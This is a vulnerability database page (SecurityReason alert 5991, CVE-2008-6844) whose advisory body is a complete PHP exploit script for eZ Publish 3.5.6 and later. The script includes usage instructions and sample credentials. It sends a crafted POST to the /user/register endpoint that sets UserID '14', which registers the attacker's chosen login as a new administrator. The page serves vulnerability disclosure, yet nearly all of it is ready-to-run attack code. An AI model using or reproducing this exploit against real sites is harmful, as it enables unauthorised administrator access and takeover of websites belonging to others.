|
 |
| SecurityReason | ||
| WLB | ||
| Services | ||
| RSS | ||
| Corporate | ||
| Note | ||
If you have found a vulnerability, please send to our SecurityAlert Database : |
||
Home  SecurityAlert Database |
||||
SecurityAlert : 5991 CVE : CVE-2008-6844 CWE : CWE-272 SecurityRisk : High  (About) Remote Exploit : Yes Local Exploit : No Victim interaction required : No Exploit Available : Yes Credit : s4avrd0w Published : 04.07.2009
Advisory Content : <?php /* eZ Publish privilege escalation exploit by s4avrd0w [s4avrd0w@p0c.ru] Versions affected >= 3.5.6 Resolved in 3.9.5, 3.10.1, 4.0.1 More info: http://ez.no/developer/security/security_advisories/ez_publish_3_9/ezsa_200 8_003_insufficient_form_handling_made_privilege_escalation_possible * tested on version 3.9.0 usage: # ./eZPublish_privilege_escalation_exploit.php -u=username -p=password -e=email -s=EZPublish_server The options are required: -u Login of the new admin on eZ Publish -p Password of the new admin on eZ Publish -e Email where to go the letter for activation new admin account -s Target for privilege escalation example: # ./eZPublish_privilege_escalation_exploit.php -u=toor -p=P@ssw0rd -e=toor@mail.ru -s=http://127.0.0.1/ [+] Exploit successfully sending [+] Activate your new account and be registered in system using toor/P@ssw0rd */ function help_argc($script_name) { print " usage: # ./".$script_name." -u=username -p=password -e=email -s=EZPublish_server The options are required: -u Login of the new admin on eZ Publish -p Password of the new admin on eZ Publish -e Email where to go the letter for activation new admin account -s Target for privilege escalation example: # ./".$script_name." -u=toor -p=P@ssw0rd -e=toor@mail.ru -s=http://127.0.0.1/ [+] Exploit successfully sending [+] Activate your new account and be registered in system using toor/P@ssw0rd "; } function successfully($login,$password) { print " [+] Exploit successfully sending [+] Activate your new account and be registered in system using $login/$password "; } if ($argc != 5 || in_array($argv[1], array('--help', '-help', '-h', '-?'))) { help_argc($argv[0]); exit(0); } else { $ARG = array(); foreach ($argv as $arg) { if (strpos($arg, '-') === 0) { $key = substr($arg,1,1); if (!isset($ARG[$key])) $ARG[$key] = substr($arg,3,strlen($arg)); } } if ($ARG[u] && $ARG[p] && $ARG[e] && $ARG[s]) { $post_fields = array( 'ContentObjectAttribute_data_user_login_30' => $ARG[u], 'ContentObjectAttribute_data_user_password_30' => $ARG[p], 'ContentObjectAttribute_data_user_password_confirm_30' => $ARG[p], 'ContentObjectAttribute_data_user_email_30' => $ARG[e], 'UserID' => '14', 'PublishButton' => '1' ); $headers = array( 'User-Agent' => 'Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14', 'Referer' => $ARG[s] ); $res_http = new HttpRequest($ARG[s]."/user/register", HttpRequest::METH_POST); $res_http->addPostFields($post_fields); $res_http->addHeaders($headers); try { $response = $res_http->send()->getBody(); if (eregi("success", $response)) { successfully($ARG[u],$ARG[p]); } else { print "[-] Exploit failed"; } } catch (HttpException $exception) { print "[-] Not connected"; exit(0); } } else { help_argc($argv[0]); exit(0); } } ?>  Feedback : If you have additional information or notice any errors regarding this security advisory, please use contact form or email us at info()securityreason()com. |
||||
| Alert | ||
libc:fts_*() Multiple Denial of Service
The fts functions are provided for traversing UNIX file hierarchies... |
||
| Apache |  |
|
» Apache Tomcat 6.0.20 and |
||
» Apache Tomcat 6.0.20 and |
||
» Apache Tomcat 6.0.20 and |
||
| PHP | |
|
» PHP 5.2.12/5.3.1 |
||
- 2009-10-02| Copyright © SecurityReason.com. All Rights Reserved. |